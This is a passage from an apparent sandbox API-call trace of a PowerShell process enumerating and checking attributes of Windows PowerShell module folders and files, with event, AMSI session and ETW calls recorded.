lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c2fdb4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.982] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.982] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0218.982] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", nBufferLength=0x3a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat", lpFilePart=0x0) returned 0x39 [0218.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.982] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7d5c2, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.983] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.983] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0218.983] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x3a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0218.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.984] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1c7e767, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207eb5c8, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.984] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.984] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0218.984] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x3f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0218.984] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.984] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1d3e2ea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.985] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0218.985] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x41, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0218.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.985] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbbc19, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2081182e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.986] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0218.986] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x3c, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0218.986] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.986] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1dbc877, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.986] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.987] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0218.987] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x4d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0218.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.987] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e300dc, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20837aa0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.987] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.987] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0218.987] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x45, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44 [0218.987] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.988] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e30eea, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.988] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.988] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0218.988] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x37, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", lpFilePart=0x0) returned 0x36 [0218.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.988] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e319e4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.989] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.989] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0218.989] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x3d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", lpFilePart=0x0) returned 0x3c [0218.989] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.989] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e92e4b, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2085dd02, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.990] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0218.990] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x43, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42 [0218.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.990] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e93bbd, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x208aa1cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.990] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.991] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0218.991] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0218.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.991] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1e950c4, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d04b97d, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.991] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0218.991] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0218.991] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.991] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f64ff6, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0218.994] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0218.994] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.994] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x185d2759, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1f65404, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2091c8fd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.995] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0218.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0219.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0219.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0219.011] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x933e780 | out: lpFindFileData=0x933e780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x784d9c0 [0219.011] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0219.012] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x983, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0219.012] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0219.012] FindNextFileW (in: hFindFile=0x784d9c0, lpFindFileData=0x933e78c | out: lpFindFileData=0x933e78c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0219.013] CoCreateGuid (in: pguid=0x933ea98 | out: pguid=0x933ea98*(Data1=0xa3df9df4, Data2=0x59c4, Data3=0x443c, Data4=([0]=0xbc, [1]=0x4d, [2]=0xb3, [3]=0xff, [4]=0xe9, [5]=0x32, [6]=0x8b, [7]=0x0))) returned 0x0 [0219.091] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x878 [0219.091] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x89c [0219.091] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a0 [0219.091] SetEvent (hEvent=0x8a0) returned 1 [0219.091] SetEvent (hEvent=0x87c) returned 1 [0219.091] SetEvent (hEvent=0x878) returned 1 [0219.092] SetEvent (hEvent=0x89c) returned 1 [0219.093] AmsiCloseSession () returned 0x33777e8 [0219.095] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a4 [0219.096] SetThreadUILanguage (LangId=0x0) returned 0xe90409 [0219.136] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x933e760*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933e760*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc0, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0219.136] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x933e6cc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x933e6cc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xb7, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0219.136] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x933e750*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc0, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x933e750*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xc0, [1]=0x51, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0219.198] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0219.199] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x933e594 | out: lpFileInformation=0x933e594*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5a6a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fe5a6a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fe5a6a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x983)) returned 1 [0219.200] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0219.200] CoTaskMemAlloc (cb=0x20c) returned 0x785daf8 [0219.200] GetSystemDirectoryW (in: lpBuffer=0x785daf8, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0219.200] CoTaskMemFree (pv=0x785daf8) [0219.200] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x933e1f8 | out: lpFileInformation=0x933e1f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0219.201] GetSystemInfo (in: lpSystemInfo=0x933e22c | out: 